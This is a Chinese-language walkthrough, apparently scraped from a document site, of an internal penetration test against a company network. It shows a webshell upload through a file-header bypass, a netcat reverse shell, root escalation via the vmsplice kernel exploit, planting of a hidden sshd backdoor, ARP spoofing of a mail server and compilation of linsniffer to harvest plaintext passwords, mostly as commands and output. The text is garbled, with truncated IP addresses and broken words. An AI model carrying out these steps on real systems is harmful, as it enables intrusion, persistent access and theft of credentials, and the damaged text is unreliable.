Linux下ARP欺騙嗅探內(nèi)部滲透測(cè)試

1、linux下arp欺騙嗅探內(nèi)部滲透測(cè)試linux下arp哄騙嗅探內(nèi)部滲透測(cè)試 早就跟相關(guān)人員說過郵箱認(rèn)證smtp和pop協(xié)議要做加密，否則在公司內(nèi)網(wǎng)，太簡(jiǎn)單被人sniffer到明文密碼了，另外郵箱密碼和公用， bbs也是采納的http協(xié)議，沒實(shí)用https，這些都是問題。雖然我們控制的網(wǎng)絡(luò)部分已經(jīng)做過處理了，ip和mac地址做了綁定，即使有人做arp欺 騙后，除非不出網(wǎng)關(guān)，否則哄騙后網(wǎng)絡(luò)到達(dá)不了網(wǎng)關(guān)之外，因此嗅探明文郵箱密碼已經(jīng)不行能（因?yàn)猷]箱服務(wù)器不在同一網(wǎng)段）。但是對(duì)于我們一些共用資源的服務(wù) 器有公網(wǎng)ip和內(nèi)網(wǎng)ip且處于一個(gè)相對(duì)風(fēng)險(xiǎn)較高，而且沒有按照平安級(jí)別舉行過相應(yīng)的平安策略的網(wǎng)絡(luò)環(huán)境內(nèi)

2、，因此一些問題是自不待言的，但是某些人根本不以 為然。所以我舉行了一次容易的內(nèi)部滲透測(cè)試。 首先我從有公網(wǎng)ip和內(nèi)網(wǎng)ip的網(wǎng)絡(luò)段入手，如公網(wǎng)ip段是/55，內(nèi)網(wǎng)ip段/。 經(jīng)過踩點(diǎn)發(fā)覺7（7）上跑了一個(gè)老版本的某的。經(jīng)過檢測(cè)，存在上傳漏洞，利用gif89a文件頭哄騙漏洞上傳webshell。然后上傳個(gè)nst。 1： 利用too里面的反彈銜接： 首先在本地用 -l -p 5546監(jiān)聽端口 4： 然后在nst上點(diǎn)back connect 2：（注重紅色

3、部分） 勝利登陸 3： 在本地nc的窗口操作： uid=99(nobody) gid=99(nobody) groups=99(nobody) 權(quán)限低了點(diǎn)，可以利用前一段時(shí)光linux內(nèi)核vmsplice本地提升權(quán)限漏洞。先用nst上傳代碼： 6：（注重紅色部分，上傳勝利） 回到nc窗口： in.c /tmp /tmp ls in.c nst_c_bc_c.c sess_af927ee319af5d5569b61ac520e53fcf ssh-zeofp16753 tunl0 gcc -o in in.c ls in in.c nst_c_bc_c.c sess_af927ee319af5d5

4、569b61ac520e53fcf ssh-zeofp16753 tunl0 /tmp/in bash: no job conol in this shell rootbbs111 tmp id uid=0(root) gid=0(root) groups=99(nobody) rootbbs111 tmp 已經(jīng)是root權(quán)限了，下一步上傳俺修改過的常用的后門，這個(gè)以前寫過 一篇文章介紹如何留后門的，這里就不講述了（替換sshd和部分，可躲藏端口、銜接、文件、進(jìn)程等）。 擦擦pp，舉行下一步我們的重點(diǎn)。 我們還是挺直用后門sshd登錄。還是ssh舒適點(diǎn)：） 在securecrt下利用rz指令上

5、傳我們用到的arpsniffer.c，然后編譯： rootbbs111 root gcc -i/usr/local/include -l/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -et 報(bào)錯(cuò)，可能是沒裝libnet的緣故，看解釋make: first you must install pcap and libnet 確定arpsniffer.c需要先裝pcap和 libnet。 rootbbs111 root rpm -ivh libnet--2.1.fc2.rf.i386.rpm rootbbs111 root wget

6、rootbbs111 root tar zxvf libpcap-0.8.1.tar.gz rootbbs111 root cd libpcap-0.8.1 rootbbs111 libpcap-0.8.1 ./configure rootbbs111 libpcap-0.8.1 make rootbbs111 libpcap-0.8.1 make install 預(yù)備工作已經(jīng)ok。下面重新編譯arpsniffer.c rootbbs111 root gcc -i/usr/local/include -l/usr/local/lib -o arpsniffer arpsniffer.c -lp

7、cap -lnet 這次沒報(bào)錯(cuò)，編譯勝利。 rootbbs111 root ./arpsniffer = =arp sniffer= =write by paris-ye= =usage: ./arpsniffer -i interface -m self ip -w workion ip -s server ip -p port =for ample: ./arpsniffer -i eth0 -m -w -s 54 下面開頭哄騙，因?yàn)槭欠?wù)器端，因此我們哄騙網(wǎng)關(guān)：（網(wǎng)絡(luò)環(huán)境如下，郵件服務(wù)器ip：1

8、網(wǎng)關(guān)： 本機(jī)：7） rootbbs111 root ./arpsniffer -i eth0 -m 7 -w -s 1 -p 110 110 110 get network cards mac aress: m- 00:0e:a6:a5:80:4f w- 00:0f:e2:23:05:d0 s- 00:d0:b7:88:07:59 now start. . . 在另一個(gè)登錄里面用監(jiān)聽下： rootbbs111 root tcpdump -i eth0 host

9、1 發(fā)覺有數(shù)據(jù)，把監(jiān)聽的數(shù)據(jù)存在文件里面： rootbbs111 root tcpdump -i eth0 host 2 -w pop.txt 10分鐘后停止，在securecrt下用sz指令下載pop.txt到本地，然后用ethereal分析。果真發(fā)覺明文用戶名和密碼。 下面我們就可以用linsniffer監(jiān)聽我們想要的用戶名和密碼了。 先修改linsniffer.c：按照自己的需求監(jiān)聽相應(yīng)的應(yīng)用密碼。我的如下： if(ntohs(tcp- dest)=21) p=1; /* */ if(ntohs(tcp- dest)=22) p=1; /* ssh for compa

10、rison add for example only comment out if desired*/ if(ntohs(tcp- dest)=23) p=1; /* */ if(ntohs(tcp- dest)=80) p=1; /* http */ if(ntohs(tcp- dest)=110) p=1; /* pop3 */ if(ntohs(tcp- dest)=513) p=1; /* rlogin */ if(ntohs(tcp- dest)=106) p=1; /* pop */ rootbbs111 root gcc -o linsniffer linsniffer.c in included from /usr/include/linux/tcp.h:21, from linsniffer.c:32: /usr/include/asm/byteorder.h:6:2: warning: warning using private kernel header; include endian.h instead! 不用管警告，挺直運(yùn)行編譯后的linsniffer即可。 rootbbs111 root ./linsniffer